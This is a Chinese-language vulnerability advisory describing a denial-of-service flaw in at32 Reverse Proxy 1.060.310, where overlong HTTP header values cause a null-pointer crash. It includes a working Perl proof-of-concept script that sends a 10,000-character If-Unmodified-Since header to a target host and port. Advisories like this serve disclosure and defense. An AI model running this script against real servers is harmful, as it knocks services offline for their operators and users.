首页 / 操作系统 / Linux / at32 Reverse Proxy多个HTTP标头字段拒绝服务漏洞

发布日期：2012-03-20
更新日期：2012-03-21受影响系统：
at32 at32 Reverse Proxy 1.060.310
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52553at32 Reverse Proxy允许在单个IP或端口上服务保存多个网站。at32 Reverse Proxy在HTTP代理服务中的HTTP标头字段（例如If-Modified-Since、Server等）中存在空指针引用漏洞，可通过HTTP标头中的超长字符串，造成崩溃。<*来源：demonalex
 
  链接：http://secunia.com/advisories/48460/
*>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！demonalex （）提供了如下测试方法：
#-------------------------------------------------------------
#！/usr/bin/perl -w
use Socket;
$|=1;
print "*****************************************"." ";
print "* At32 Reverse Proxy v1.060.310 DoS PoC *"." ";
print "* writed by demonalex （at） 163 （dot） com [email concealed] *"." ";
print "*****************************************"." ";
$evil="A"x10000;
$test_ip=shift; #target ip
$test_port=shift; #target port
if（！defined（$test_ip） || ！defined（$test_port））{
die "usage : $0 target_ip target_port ";
}
$test_payload=
"GET / HTTP/1.0 ".
"Accept: */* ".
"Accept-Language: zh-cn ".
"UA-CPU: x86 ".
"If-Unmodified-Since: ".$evil." ".
"Accept-Encoding: gzip, deflate ".
"User-Agent: Mozilla/4.0 （compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE） ".
"Host: ".$test_ip." ".
"Connection: Keep-Alive"." ";
$test_target=inet_aton（$test_ip）;
$test_target=sockaddr_in（$test_port, $test_target）;
socket（SOCK, AF_INET, SOCK_STREAM, 6） || die "cannot create socket！ ";
connect（SOCK, $test_target） || die "cannot connect the target！ ";
send（SOCK, $test_payload, 0） || die "cannot send the payload！ ";
#recv（SOCK, $test_payload, 100, 0）;
close（SOCK）;
print "done！ ";
exit（1）;
#-------------------------------------------------------------建议：
--------------------------------------------------------------------------------
厂商补丁：at32
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.at32.com/doc/rproxy.htmDell Webcam Center "CrazyTalk4Native.dll" ActiveX多个缓冲器溢出漏洞Tiny Server HTTP HEAD请求远程拒绝服务漏洞相关资讯      at32 Reverse Proxy  本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内 收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图